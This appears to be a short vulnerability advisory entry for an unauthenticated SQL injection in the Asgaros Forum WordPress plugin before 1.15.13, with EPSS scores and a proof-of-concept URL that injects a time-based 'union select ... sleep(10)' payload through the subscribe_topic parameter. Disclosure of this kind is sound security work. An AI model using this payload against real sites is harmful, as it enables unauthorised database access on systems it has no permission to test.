Lucene search

K
wpexploitJrXnmWPEX-ID:36CC5151-1D5E-4874-BCEC-3B6326235DB1
HistoryOct 11, 2021 - 12:00 a.m.

Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection

2021-10-1100:00:00
JrXnm
670

0.213 Low

EPSS

Percentile

96.5%

The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue

https://example.com/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10)

0.213 Low

EPSS

Percentile

96.5%